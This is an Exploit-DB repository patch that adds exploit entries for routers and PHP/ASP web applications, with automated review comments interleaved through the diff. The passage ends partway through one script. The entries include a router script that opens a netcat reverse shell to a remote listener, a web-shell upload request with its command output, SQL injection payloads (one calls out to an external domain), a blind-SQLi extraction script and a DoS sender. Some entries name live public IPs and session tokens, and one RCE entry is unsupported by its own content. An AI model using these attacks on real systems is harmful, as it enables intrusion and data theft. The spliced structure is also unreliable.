From 9b56e8731eb190562969bbef530dc280a735d21b Mon Sep 17 00:00:00 2001 
From: Exploit-DB Date: Sat, 1 Apr 2023 00:16:31 +0000 Subject: [PATCH] DB: 2023-04-01 25 changes to exploits/shellcodes/ghdb EQ Enterprise management system v2.2.0 - SQL Injection qubes-mirage-firewall v0.8.3 - Denial Of Service (DoS) ASKEY RTF3505VW-N1 - Privilege Escalation Bangresto 1.0 - SQL Injection Bludit 3-14-1 Plugin 'UploadPlugin' - Remote Code Execution (RCE) (Authenticated) Cacti v1.2.22 - Remote Command Execution (RCE) Judging Management System v1.0 - Authentication Bypass Judging Management System v1.0 - Remote Code Execution (RCE) rconfig 3.9.7 - Sql Injection (Authenticated) Senayan Library Management System v9.0.0 - SQL Injection Spitfire CMS 1.0.475 - PHP Object Injection Textpattern 4.8.8 - Remote Code Execution (RCE) (Authenticated) WooCommerce v7.1.0 - Remote Code Execution(RCE) CoolerMaster MasterPlus 1.8.5 - 'MPService' Unquoted Service Path SOUND4 IMPACT/FIRST/PULSE/Eco v2.x - Denial Of Service (DoS) SOUND4 IMPACT/FIRST/PULSE/Eco v2.x - Authorization Bypass (IDOR) SOUND4 IMPACT/FIRST/PULSE/Eco v2.x - Authentication Bypass SOUND4 IMPACT/FIRST/PULSE/Eco v2.x - Cross-Site Request Forgery SOUND4 IMPACT/FIRST/PULSE/Eco v2.x - Directory Traversal File Write Exploit SOUND4 IMPACT/FIRST/PULSE/Eco v2.x - Remote Command Execution (RCE) SOUND4 IMPACT/FIRST/PULSE/Eco v2.x - Unauthenticated Factory Reset SOUND4 Server Service 4.1.102 - Local Privilege Escalation macOS/x64 - Execve Null-Free Shellcode --- exploits/asp/webapps/51154.txt | 24 ++++ exploits/hardware/dos/51157.py | 24 ++++ exploits/hardware/remote/51155.sh | 67 +++++++++ exploits/php/webapps/51156.txt | 27 ++++ exploits/php/webapps/51160.txt | 139 +++++++++++++++++++ exploits/php/webapps/51161.txt | 62 +++++++++ exploits/php/webapps/51162.txt | 58 ++++++++ exploits/php/webapps/51163.py | 76 +++++++++++ exploits/php/webapps/51164.py | 118 ++++++++++++++++ exploits/php/webapps/51165.txt | 36 +++++ exploits/php/webapps/51166.py | 69 ++++++++++ exploits/php/webapps/51175.txt | 56 ++++++++ 
exploits/php/webapps/51176.txt | 132 ++++++++++++++++++ exploits/windows/local/51159.txt | 32 +++++ exploits/windows/local/51167.txt | 61 +++++++++ exploits/windows/local/51168.txt | 69 ++++++++++ exploits/windows/local/51169.txt | 165 +++++++++++++++++++++++ exploits/windows/local/51170.txt | 74 ++++++++++ exploits/windows/local/51171.txt | 67 +++++++++ exploits/windows/local/51172.txt | 80 +++++++++++ exploits/windows/local/51173.txt | 75 +++++++++++ exploits/windows/local/51174.txt | 68 ++++++++++ files_exploits.csv | 22 +++ files_shellcodes.csv | 1 + shellcodes/macos/51177.txt | 216 ++++++++++++++++++++++++++++++ 25 files changed, 1818 insertions(+) create mode 100644 exploits/asp/webapps/51154.txt create mode 100755 exploits/hardware/dos/51157.py create mode 100755 exploits/hardware/remote/51155.sh create mode 100644 exploits/php/webapps/51156.txt create mode 100644 exploits/php/webapps/51160.txt create mode 100644 exploits/php/webapps/51161.txt create mode 100644 exploits/php/webapps/51162.txt create mode 100755 exploits/php/webapps/51163.py create mode 100755 exploits/php/webapps/51164.py create mode 100644 exploits/php/webapps/51165.txt create mode 100755 exploits/php/webapps/51166.py create mode 100644 exploits/php/webapps/51175.txt create mode 100644 exploits/php/webapps/51176.txt create mode 100644 exploits/windows/local/51159.txt create mode 100644 exploits/windows/local/51167.txt create mode 100644 exploits/windows/local/51168.txt create mode 100644 exploits/windows/local/51169.txt create mode 100644 exploits/windows/local/51170.txt create mode 100644 exploits/windows/local/51171.txt create mode 100644 exploits/windows/local/51172.txt create mode 100644 exploits/windows/local/51173.txt create mode 100644 exploits/windows/local/51174.txt create mode 100644 shellcodes/macos/51177.txt diff --git a/exploits/asp/webapps/51154.txt b/exploits/asp/webapps/51154.txt new file mode 100644 index 000000000..fcbe70db1 --- /dev/null 
+++ b/exploits/asp/webapps/51154.txt
@@ -0,0 +1,24 @@
+Exploit Title: EQ Enterprise management system v2.2.0 - SQL Injection
+Date: 2022.12.7
+Exploit Author: TLF
+Vendor Homepage: https://www.yiquantech.com/pc/about.html
+Software Link(漏洞影响应用下载链接): http://121.8.146.131/,http://183.233.152.14:9000/,http://219.135.168.90:9527/,http://222.77.5.250:9000/,http://219.135.168.90:9530/
+Version: EQ v1.5.31 to v2.2.0
+Tested on: windows 10
+CVE : CVE-2022-45297
+
+
+POC:
+POST /Account/Login HTTP/1.1
+Host: 121.8.146.131
+User-Agent:Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
+Content-Length: 118
+Accept: application/json, text/javascript, */*; q=0.01
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+Content-Type: application/x-www-form-urlencoded;
+charset=UTF-8 Cookie: ASP.NET_SessionId=tlipmh0zjgfdm5b4h1tgvolg
+Origin: http://121.8.146.131
+Referer: http://121.8.146.131/Account/Login
+X-Requested-With: XMLHttpRequest
+Accept-Encoding: gzip
+RememberPwd=false&ServerDB=EQ%27and%28select%2B1%29%3E0waitfor%2F%2A%2A%2Fdelay%270%3A0%3A0&UserNumber=%27&UserPwd=%27
\ No newline at end of file
diff --git a/exploits/hardware/dos/51157.py b/exploits/hardware/dos/51157.py
new file mode 100755
index 000000000..5bf9e7428
--- /dev/null
+++ b/exploits/hardware/dos/51157.py
@@ -0,0 +1,24 @@
+# Exploit Title: qubes-mirage-firewall v0.8.3 - Denial Of Service (DoS)
+# Date: 2022-12-04
+# Exploit Author: Krzysztof Burghardt
+# Vendor Homepage: https://mirage.io/blog/MSA03
+# Software Link: https://github.com/mirage/qubes-mirage-firewall/releases
+# Version: >= 0.8.0 & < 0.8.4
+# Tested on: Qubes OS
+# CVE: CVE-2022-46770
+
+#PoC exploit from https://github.com/mirage/qubes-mirage-firewall/issues/166
+
+#!/usr/bin/env python3
+
+from socket import socket, AF_INET, SOCK_DGRAM
+
+TARGET = "239.255.255.250"
+
+PORT = 5353
+
+PAYLOAD = b'a' * 607
+
+s = socket(AF_INET, SOCK_DGRAM)
+
+s.sendto(PAYLOAD, (TARGET, PORT))
\ No newline at end of file
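Review bot: The `Software Link` field lists five live public IP addresses, and the PoC's `Host`, `Origin` and `Referer` headers point at one of them, so the entry publishes what look like third-party production deployments instead of a vendor download; the field should carry the vendor's download page and the request should use a placeholder such as `Host: <target>`. The `Cookie: ASP.NET_SessionId=tlipmh0zjgfdm5b4h1tgvolg` value is a real session identifier and should be redacted for the same reason. The `Content-Type` header is also broken across two lines (`charset=UTF-8` starts line 19 and is followed by `Cookie:` on the same line), so the request as pasted is not a well-formed HTTP message. For remediation the only actionable fact is the affected range `EQ v1.5.31 to v2.2.0` and CVE-2022-45297; the entry does not say which parameter (`ServerDB` is the one carrying the injection) the vendor should parameterize, and a one-line statement of that would help defenders.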
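Review bot: The `#!/usr/bin/env python3` line sits at line 12, after the comment header and a blank line, so it is an ordinary comment and has no effect even though the file is added with mode 100755; it should be the first line of the file. The UDP socket created by `s = socket(AF_INET, SOCK_DGRAM)` is never closed; `with socket(AF_INET, SOCK_DGRAM) as s:` releases it deterministically. For operators the actionable facts here are `# Version: >= 0.8.0 & < 0.8.4` and the MSA03 advisory linked as the vendor homepage, i.e. affected firewalls should be on 0.8.4 or later; noting that explicitly in the header would make the entry more useful than the script itself.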
diff --git a/exploits/hardware/remote/51155.sh b/exploits/hardware/remote/51155.sh
new file mode 100755
index 000000000..536fbebfc
--- /dev/null
+++ b/exploits/hardware/remote/51155.sh
@@ -0,0 +1,67 @@
+# Exploit Title: ASKEY RTF3505VW-N1 - Privilege escalation
+# Date: 07-12-2022
+# Exploit Author: Leonardo Nicolas Servalli
+# Vendor Homepage: www.askey.com
+# Platform: ASKEY router devices RTF3505VW-N1
+# Tested on: Firmware BR_SV_g000_R3505VMN1001_s32_7
+# Vulnerability analysis: https://github.com/leoservalli/Privilege-escalation-ASKEY/blob/main/README.md
+
+#Description:
+#----------
+
+# Mitrastar ASKEY RTF3505VW-N1 devices are provided with access through ssh into a restricted default shell (credentials are on the back of the router and in some cases this routers use default credentials).
+
+# The command “tcpdump” is present in the restricted shell and do not handle correctly the -z flag, so it can be used to escalate privileges through the creation of a local file in the /tmp directory of the router, and injecting packets through port 80 used for the router's Web GUI) with the string ";/bin/bash" in order to be executed by "-z sh". By using “;/bin/bash” as injected string we can spawn a busybox/ash console.
+
+#Exploit:
+#--------
+#!/usr/bin/bash
+
+if [ -z "$@" ]; then
+ echo "Command example: $0 routerIP routerUser routerPassword remoteIPshell remotePortShell "
+ exit 0
+fi
+
+for K in $(seq 1 15) # Attemps
+do
+
+echo "**************************************************************************************"
+echo "******************************** Attempt number $K ************************************"
+echo "**************************************************************************************"
+
+for l in $(seq 1 200) ; do echo ";/bin/bash" | nc -p 8888 $1 80 ; done > /dev/null 2>&1 & # start a background loop injecting the string ";/bin/bash" on the port 80 of the router
+
+# Expect script for interact with the router through SSH, login, launch the tcpdump with the option "-z sh", and finally launch a more stable busybox reverse shell to our listener
+/usr/bin/expect << EOD
+ spawn ssh $2@$1
+ expect {
+ "password: " {
+ send "$3\r"
+ expect ">"
+ send -- "tcpdump -v -ln -i any -w /tmp/runme$K -W 1 -G 1 -z sh src port 8888\r" # filter by source port 8888
+ }
+ "yes/no" {
+ send "yes\r"
+ #exp_continue
+ }
+ }
+ set timeout 2
+ expect {
+ timeout {
+ puts "Timeout..."
+ send "exit\r"
+ exit 0
+ }
+
+ "*usy*ox" {
+ expect "#"
+ send "rm /tmp/runme* \r"
+ send "rm -f /tmp/f;mknod /tmp/f p;cat /tmp/f | /bin/sh -i 2>&1|nc $4 $5 >/tmp/f \r"
+ puts "Rooted !!!!!!!!!"
+ set timeout -1
+ expect "NEVER_APPEARING_STRING#" # wait an infinite time to mantain the rverse shell open
+ }
+ }
+EOD
+
+done
\ No newline at end of file
diff --git a/exploits/php/webapps/51156.txt b/exploits/php/webapps/51156.txt
new file mode 100644
index 000000000..14adfec39
--- /dev/null
+++ b/exploits/php/webapps/51156.txt
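Review bot: The argument check `if [ -z "$@" ]; then` does not validate the five positional parameters the script reads (`$1` through `$5`): with several arguments `"$@"` expands to several words and `[` reports "too many arguments", and with one to four arguments the test is simply false, so the expect block runs with empty values. `if [ "$#" -ne 5 ]; then` matches the usage line printed right below it. The `#!/usr/bin/bash` line is at line 18, after the comment header, so it is inert and the 100755 mode does not make the file runnable under bash by itself. From a defender's side, the router password is taken as `$3` and interpolated into the unquoted `<< EOD` heredoc, so it is exposed in process listings and shell history of whatever host runs this; the advisory's remediation is the firmware line named in `Tested on`, and operators should also change the credentials printed on the device.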
@@ -0,0 +1,27 @@
+# Title: Wordpress Plugin WooCommerce v7.1.0 - Remote Code Execution(RCE)
+# Date: 2022-12-07
+# Author: Milad Karimi
+# Vendor Homepage: https://wordpress.org/plugins/woocommerce
+# Software Link: https://wordpress.org/plugins/woocommerce
+# Tested on: windows 10 , firefox
+# Version: 7.1.0
+# CVE : N/A
+
+# Description:
+simple, easy to use jQuery frontend to php backend that pings various
+devices and changes colors from green to red depending on if device is
+up or down.
+
+# PoC :
+
+http://localhost/woocommerce/includes/admin/meta-boxes/class-wc-meta-box-product-images.php?product-type=;echo '' >info.php
+http://localhost/woocommerce/includes/admin/meta-boxes/class-wc-meta-box-product-images.php?product-type=;echo '' >info.php
+
+
+# Vulnerabile code:
+
+ 95: $classname $classname($post_id);
+  94: $classname = WC_Product_Factory::get_product_classname($post_id, $product_type : 'simple');
+    92: ⇓ function save($post_id, $post)
+       93: $product_type = WC_Product_Factory::get_product_type($post_id) : sanitize_title(stripslashes($_POST['product-type']));
+          92: ⇓ function save($post_id, $post)
\ No newline at end of file
diff --git a/exploits/php/webapps/51160.txt b/exploits/php/webapps/51160.txt
new file mode 100644
index 000000000..10abd0016
--- /dev/null
+++ b/exploits/php/webapps/51160.txt
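Review bot: The `# Description:` paragraph (`simple, easy to use jQuery frontend to php backend that pings various devices ...`) describes an unrelated product and has evidently been pasted from another advisory; it should describe WooCommerce and the flaw being claimed. The quoted `Vulnerabile code` shows `$_POST['product-type']` passing through `sanitize_title()` (line 93) into `get_product_classname()` (line 94), which is a class-name lookup, and the page never identifies a sink where the `;echo` in the PoC URL would reach a command interpreter, so the entry does not substantiate its RCE title and carries `CVE : N/A`. The two PoC lines are identical and `echo ''` writes an empty file, so they demonstrate nothing even on the author's own terms. Readers should treat this entry as unverified until a concrete sink is named.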
@@ -0,0 +1,139 @@ +# Exploit Title: Bludit 3-14-1 Plugin 'UploadPlugin' - Remote Code Execution (RCE) (Authenticated) +# Exploit Author: Alperen Ergel +# Contact: @alpernae (IG/TW) +# Software Homepage: https://www.bludit.com/ +# Version : 3-14-1 +# Tested on: windows 11 wampserver | Kali linux +# Category: WebApp +# Google Dork: intext:'2022 Powered by Bludit' +# Date: 8.12.2022 +######## Description ######## +# +# Step 1 : Archive as a zip your webshell (example: payload.zip) +# Step 2 : Login admin account and download 'UploadPlugin' +# Step 3 : Go to UploadPlugin section +# Step 4 : Upload your zip +# Step 5 : target/bl-plugins/[your_payload] +# +######## Proof of Concept ######## + + +==============> START REQUEST <======================================== + +POST /admin/plugin/uploadplugin HTTP/2 +Host: localhost +Cookie: BLUDIT-KEY=ri91q86hhp7mia1o8lrth63kc4 +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Content-Type: multipart/form-data; boundary=---------------------------308003478615795926433430552264 +Content-Length: 1820 +Origin: https://036e-88-235-222-210.eu.ngrok.io +Dnt: 1 +Referer: https://036e-88-235-222-210.eu.ngrok.io/admin/plugin/uploadplugin +Upgrade-Insecure-Requests: 1 +Sec-Fetch-Dest: document +Sec-Fetch-Mode: navigate +Sec-Fetch-Site: same-origin +Sec-Fetch-User: ?1 +Te: trailers + +-----------------------------308003478615795926433430552264 +Content-Disposition: form-data; name="tokenCSRF" + +b6487f985b68f2ac2c2d79b4428dda44696d6231 +-----------------------------308003478615795926433430552264 +Content-Disposition: form-data; name="pluginorthemes" + +plugins +-----------------------------308003478615795926433430552264 +Content-Disposition: form-data; name="zip_file"; filename="a.zip" +Content-Type: application/zip + +PK †eˆU  a/PK  ”fˆUÆ ª)¢ Ä + 
a/a.phpíVێÓ0}ç+La BÛìVܖpX®ËJ @V꺭!µƒíÒrûwl7É$mQyà‘<$©çÌÌ93ã¸È]ƒË·ï–óÒ=/. pÝãZ+M5/•¶BÎÈ0>©M†[jłÓB,„õtO̤Ҝ. +×4;’†e)¨ƒ¼Èה¯9[Z¡dðÆ „Œ&Âd<ó`÷+œN—’y¼Á +RLÉE¾(í7â}âø‡_‡¥æ3OºÈ'xð>A¯ p‚pânÁã¤ëÀ×e¡&œük£‹¼$Øj±ØFýâ…á@\@ªgxD¢Ì'áôæQ?½v£ŸöG7ñùZgéññõ“ +j±u +\õ„±†à/ï¾Îޞ´×T™HÄZu™jœHkª‰È£û§gÑÅ,CÆêRâVjÅ5yùø%}q»ú­„Ä(ŽQK*Ë"Öï¡£;—Ò²·­6z²ZŸgXÊò¢ðíÄ'éûù+ñÌ% +µj,ÐäàN°ùf,_à8—“‹•[³˜lO€ScsmI«‡¬«H»¯*Sc?i”)i¹´&x@.'”<—¤Ûç]zs^a®·)‚hBz0;f rì‰þǸ0yÕU¥H"ÕÕÿI IØ\“t{có~€J©£ªä²Ë Ö÷š;dÁ³âÙlh†»s%Ç Ö8Nº+«}+Ž­ÿaºržŸŸžÂÂj. +îvWS²A¿O?nHO?›jžO ¤Ã£Q+ì¯æí^ Ï +e8©ô*Ô¾"ý¡@Ó2+ëÂ`÷ +kC57j©'Î"m + ã®ho¹ xŸô Û;’œcçzÙQ +Ë·[kô¿Ý¯-2ì~¨“æv©¥C€î‘Tþ#k2,UØSŽ¦€­OÁS£Øg˜‚úK †QˆÜ ØIϲòÖ`Ð:%F½$A"t;buOMr4Ýè~–eãΙåØXíÇm˜Ç(s 6A¸3,l>º…yþðMröâÁSzöæõÃûÏÜû)}óàeºqQRrf}êê_ D Ø0ìu’õv'§öø?@‡ êûOæh'˜Oœ8f—D¼5[à²=b~PK? †eˆU  $ €íA a/ +   þš®, +Ù þš®, +Ù€ø¨j. +ÙPK?  ”fˆUÆ ª)¢ Ä + $ €¤ a/a.php +   ¤eÝ- +Ù ÷C- +Ù bj. +ÙPK   ­ ç +-----------------------------308003478615795926433430552264 +Content-Disposition: form-data; name="submit" + +Upload +-----------------------------308003478615795926433430552264-- + + +==============> END REQUEST <======================================== + +## WEB SHELL UPLOADED! + +==============> START RESPONSE <======================================== + +HTTP/2 200 OK +Cache-Control: no-store, no-cache, must-revalidate +Content-Type: text/html; charset=UTF-8 +Date: Thu, 08 Dec 2022 18:01:43 GMT +Expires: Thu, 19 Nov 1981 08:52:00 GMT +Ngrok-Trace-Id: f3a92cc45b7ab0ae86e98157bb026ab4 +Pragma: no-cache +Server: Apache/2.4.51 (Win64) PHP/7.4.26 +X-Powered-By: Bludit +. +. +. +. 
+ +==============> END RESPONSE <======================================== + +# REQUEST THE WEB SHELL + +==============> START REQUEST <======================================== + +GET /bl-plugins/a/a.php?cmd=whoami HTTP/2 +Host: localhost +Cookie: BLUDIT-KEY=ri91q86hhp7mia1o8lrth63kc4 +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Dnt: 1 +Upgrade-Insecure-Requests: 1 +Sec-Fetch-Dest: document +Sec-Fetch-Mode: navigate +Sec-Fetch-Site: none +Sec-Fetch-User: ?1 +Te: trailers + +==============> END REQUEST <======================================== + +==============> START RESPONSE <======================================== + +HTTP/2 200 OK +Content-Type: text/html; charset=UTF-8 +Date: Thu, 08 Dec 2022 18:13:14 GMT +Ngrok-Trace-Id: 30639fc66dcf46ebe29cc45cf1bf3919 +Server: Apache/2.4.51 (Win64) PHP/7.4.26 +X-Powered-By: PHP/7.4.26 +Content-Length: 32 + +
nt authority\system
+
+ +==============> END RESPONSE <======================================== \ No newline at end of file diff --git a/exploits/php/webapps/51161.txt b/exploits/php/webapps/51161.txt new file mode 100644 index 000000000..43cd6524d --- /dev/null +++ b/exploits/php/webapps/51161.txt 
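Review bot: The raw zip bytes pasted after `Content-Type: application/zip` are binary data embedded in a text file and have been mangled by encoding, so the request body shown is not a faithful record and should be replaced by a plain statement that the `zip_file` part is a zip archive rather than by bytes. The `Origin`/`Referer` headers carry the author's real ngrok hostname, and `Cookie: BLUDIT-KEY=...` and the `tokenCSRF` value are live session material that should be placeholders. Per the steps in the header (log in as admin, install 'UploadPlugin', upload a zip) this appears to be the plugin-upload feature working as designed for an administrator rather than an access-control bypass, so the useful mitigation notes for operators are limiting admin accounts, keeping the plugin off production sites, and alerting on new directories appearing under `bl-plugins/`.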
@@ -0,0 +1,62 @@ +## Exploit Title: Senayan Library Management System v9.0.0 - SQL Injection +## Author: nu11secur1ty +## Date: 11.09.2022 +## Vendor: https://slims.web.id/web/ +## Software: https://github.com/slims/slims9_bulian/releases/download/v9.0.0/slims9_bulian-9.0.0.zip +## Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/slims.web.id/SLIMS-9.0.0/SQLi + +## Description: +The manual insertion `point 3` with `class` parameter appears to be +vulnerable to SQL injection attacks. +The payload '+(select +load_file('\\\\0absu0byc9uwy8ivftx7f6auul0fo5cwfk6at2hr.again.com\\fbe'))+' +was submitted in the manual insertion point 3. +This payload injects a SQL sub-query that calls MySQL's load_file +function with a UNC file path that references a URL on an external +domain. +The application interacted with that domain, indicating that the +injected SQL query was executed. + +## STATUS: HIGH Vulnerability + +[+] Payload: + +```MySQL +--- +Parameter: class (GET) + Type: boolean-based blind + Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY +or GROUP BY clause + Payload: reportView=true&year=2002&class=bbbb''' RLIKE (SELECT +(CASE WHEN (2547=2547) THEN 0x626262622727 ELSE 0x28 END)) AND +'dLjf'='dLjf&membershipType=a&collType=aaaa +--- +``` + +## Reproduce: +[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/slims.web.id/SLIMS-9.0.0/SQLi) + +## Proof and Exploit: +[href](http://localhost:5001/sy5wji) + +## Time spent +`03:00:00` + +System Administrator - Infrastructure Engineer +Penetration Testing Engineer +Exploit developer at +https://packetstormsecurity.com/https://cve.mitre.org/index.html and +https://www.exploit-db.com/ +home page: https://www.nu11secur1ty.com/ +hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E= + nu11secur1ty + + +-- +System Administrator - Infrastructure Engineer +Penetration Testing Engineer +Exploit developer at https://packetstormsecurity.com/ +https://cve.mitre.org/index.html and 
https://www.exploit-db.com/ +home page: https://www.nu11secur1ty.com/ +hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E= + nu11secur1ty \ No newline at end of file diff --git a/exploits/php/webapps/51162.txt b/exploits/php/webapps/51162.txt new file mode 100644 index 000000000..99b38395c --- /dev/null +++ b/exploits/php/webapps/51162.txt 
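Review bot: The author's signature block (`System Administrator - Infrastructure Engineer` through `nu11secur1ty`) appears twice, once before and once after the `--` separator, so one copy should be dropped; the same duplication is in 51175.txt. The `## Proof and Exploit:` link `http://localhost:5001/sy5wji` is the author's local address and is unreachable for readers, so it should be removed or replaced by the reference link already given above it. The description names `manual insertion point 3` and the `class` parameter of the `reportView=true` request but never names the vulnerable script inside the entry itself, which leaves a defender without a file to patch; the remediation is a parameterized query for `class`, and a line saying so would make the entry actionable.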
@@ -0,0 +1,58 @@
+# Exploit Title: Spitfire CMS 1.0.475 - PHP Object Injection
+# Exploit Author: LiquidWorm
+Vendor: Claus Muus
+Product web page: http://spitfire.clausmuus.de
+Affected version: 1.0.475
+
+Summary: Spitfire is a system to manage the content of webpages.
+
+Desc: The application is prone to a PHP Object Injection vulnerability
+due to the unsafe use of unserialize() function. A potential attacker,
+authenticated, could exploit this vulnerability by sending specially
+crafted requests to the web application containing malicious serialized
+input.
+
+-----------------------------------------------------------------------
+cms/edit/tpl_backup.inc.php:
+----------------------------
+47: private function status ()
+48: {
+49: $status = array ();
+50:
+51: $status['values'] = array ();
+52: $status['values'] = isset ($_COOKIE['cms_backup_values']) ? unserialize ($_COOKIE['cms_backup_values']) : array ();
+...
+...
+77: public function save ($values)
+78: {
+79: $values = array_merge ($this->status['values'], $values);
+80: setcookie ('cms_backup_values', serialize ($values), time()+60*60*24*30);
+81: }
+-----------------------------------------------------------------------
+
+Tested on: nginx
+
+
+Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
+ @zeroscience
+
+
+Advisory ID: ZSL-2022-5720
+Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5720.php
+
+
+28.09.2022
+
+--
+
+
+> curl -isk -XPOST http://10.0.0.2/cms/edit/tpl_backup_action.php \
+ -H 'Content-Type: application/x-www-form-urlencoded'
+ -H 'Accept: */*'
+ -H 'Referer: http://10.0.0.2/cms/edit/cont_index.php?tpl=backup'
+ -H 'Accept-Encoding: gzip, deflate'
+ -H 'Accept-Language: en-US,en;q=0.9'
+ -H 'Connection: close' \
+ -H 'Cookie: tip=0; cms_backup_values=O%3a3%3a%22ZSL%22%3a0%3a%7b%7d; cms_username=admin; PHPSESSID=0e63d3a8762f4bff95050d1146db8c1c' \
+ --data 'action=save&&value=1'
+ #--data 'action=save&&value[files]={}'
\ No newline at end of file
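Review bot: In the `curl` PoC only the first line, `-H 'Connection: close' \` and the `-H 'Cookie: ...' \` line end with a continuation backslash, so the command as pasted terminates after `-H 'Content-Type: application/x-www-form-urlencoded'` and the following `-H` lines are read by the shell as separate commands; every line but the last needs the trailing `\`. The commented alternative `#--data 'action=save&&value[files]={}'` is left without any explanation of when it applies. The quoted source already pins the sink (`unserialize ($_COOKIE['cms_backup_values'])` at line 52 of `cms/edit/tpl_backup.inc.php`) and the matching writer at line 80; a remediation line — store that state as JSON via `json_encode`/`json_decode`, or at least authenticate the cookie before deserializing — would make the advisory useful to the vendor and to operators.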
diff --git a/exploits/php/webapps/51163.py b/exploits/php/webapps/51163.py
new file mode 100755
index 000000000..d6c494fcd
--- /dev/null
+++ b/exploits/php/webapps/51163.py
@@ -0,0 +1,76 @@ +# Exploit Title: rconfig 3.9.7 - Sql Injection (Authenticated) +# Exploit Author: azhen +# Date: 10/12/2022 +# Vendor Homepage: https://www.rconfig.com/ +# Software Link: https://www.rconfig.com/ +# Vendor: rConfig +# Version: <= v3.9.7 +# Tested against Server Host: Linux +# CVE: CVE-2022-45030 + +import requests +import sys +import urllib3 +urllib3.disable_warnings() + +s = requests.Session() + +# sys.argv.append("192.168.10.150") #Enter the hostname + +if len(sys.argv) != 2: + print("Usage: python3 rconfig_sqli_3.9.7.py ") + sys.exit(1) + +host=sys.argv[1] #Enter the hostname + + +def get_data(host): + print("[+] Get db data...") + vul_url = "https://"+host+":443/lib/ajaxHandlers/ajaxCompareGetCmdDates.php?deviceId=-1&command='+union+select+concat(1000%2bord(substr({},{},1)),'-1-1')%20--%20" + + query_exp = "database()" + result_data = "" + + for i in range(1, 100): + burp0_headers = {"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:86.0) Gecko/20100101 Firefox/86.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate"} + res = requests.get(vul_url.format(query_exp, i), cookies=s.cookies,verify=False) + # print(res.text) + + a = chr(int(res.text[6:10]) - 1000) + + if a == '\x00': + break + + result_data += a + + print(result_data) + + print("[+] Database name: {}".format(result_data)) + + ''' + output: + [+] Logging in... + [+] Get db data... 
+ r + rc + rco + rcon + rconf + rconfi + rconfig + rconfigd + rconfigdb + [+] Database name: rconfigdb + ''' + + +def login(host): + print("[+] Logging in...") + url = "https://"+host+":443/lib/crud/userprocess.php" + headers = {"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:86.0) Gecko/20100101 Firefox/86.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Content-Type": "application/x-www-form-urlencoded", "Origin": "https://demo.rconfig.com", "Connection": "close", "Referer": "https://demo.rconfig.com/login.php", "Upgrade-Insecure-Requests": "1"} + + data = {"user": "admin", "pass": "admin", "sublogin": "1"} #Use valid set of credentials default is set to admin/admin + response=s.post(url, headers=headers, cookies=s.cookies, data=data, verify=False) + get_data(host) + +login(host) \ No newline at end of file diff --git a/exploits/php/webapps/51164.py b/exploits/php/webapps/51164.py new file mode 100755 index 000000000..adbfc8e01 --- /dev/null +++ b/exploits/php/webapps/51164.py 
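Review bot: `login()` assigns `response=s.post(...)` and never inspects it — neither the status nor whether a session cookie was set — before calling `get_data(host)`, so a rejected login silently continues with an anonymous session and `int(res.text[6:10])` then raises `ValueError` on whatever page comes back; the missing check should be stated or the script should stop with a message. The credentials are hard-coded as `{"user": "admin", "pass": "admin", "sublogin": "1"}` instead of being taken from arguments, and the `Origin`/`Referer` headers name `demo.rconfig.com`, the vendor's public demo, which should not be baked into a published script. The entry already identifies the sink — the `deviceId` parameter of `lib/ajaxHandlers/ajaxCompareGetCmdDates.php` — so a remediation line (parameterize that query; the vulnerable range is `<= v3.9.7`) would round it out for defenders.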
@@ -0,0 +1,118 @@ +# Exploit Title: Judging Management System v1.0 - Remote Code Execution (RCE) +# Date: 12/11/2022 +# Exploit Author: Angelo Pio Amirante +# Vendor Homepage: https://www.sourcecodester.com/ +# Software Link: https://www.sourcecodester.com/php/15910/judging-management-system-using-php-and-mysql-free-source-code.html +# Version: 1.0 +# Tested on: Windows 10 on XAAMP server + + +import requests,argparse,re,time,base64 +import urllib.parse +from colorama import (Fore as F,Back as B,Style as S) +from bs4 import BeautifulSoup + + +BANNER = """ +╔═══════════════════════════════════════════════════════════════════════════════════════════════════════╗ +║ Judging Management System v1.0 - Auth Bypass + Unrestricted File Upload = Remote Code Execution (RCE) ║ +╚═══════════════════════════════════════════════════════════════════════════════════════════════════════╝ + +""" + +def argsetup(): + desc = S.BRIGHT + 'Judging Management System v1.0 - Remote Code Execution (RCE)' + parser = argparse.ArgumentParser(description=desc) + parser.add_argument('-t', '--target', help='Target URL, Ex: http://localhost/php-jms', required=True) + parser.add_argument('-l', '--listenip', help='Listening address required to receive reverse shell', required=True) + parser.add_argument('-lp','--listenport', help='Listening port required to receive reverse shell', required=True) + args = parser.parse_args() + return args + +# Performs Auth bypass in order to get the admin cookie +def auth_bypass(args): + print(F.CYAN+"[+] Login into the application through Auth Bypass vulnerability...") + session = requests.Session() + loginUrl = f"{args.target}/login.php" + + username = """' OR 1=1-- -""" + password = "randomvalue1234" + data = {'username': username, 'password': password} + + login = session.post(loginUrl,verify=False,data=data) + admin_cookie = login.cookies['PHPSESSID'] + print(F.GREEN+"[+] Admin cookies obtained !!!") + return admin_cookie + +# Checks if the file has been uploaded 
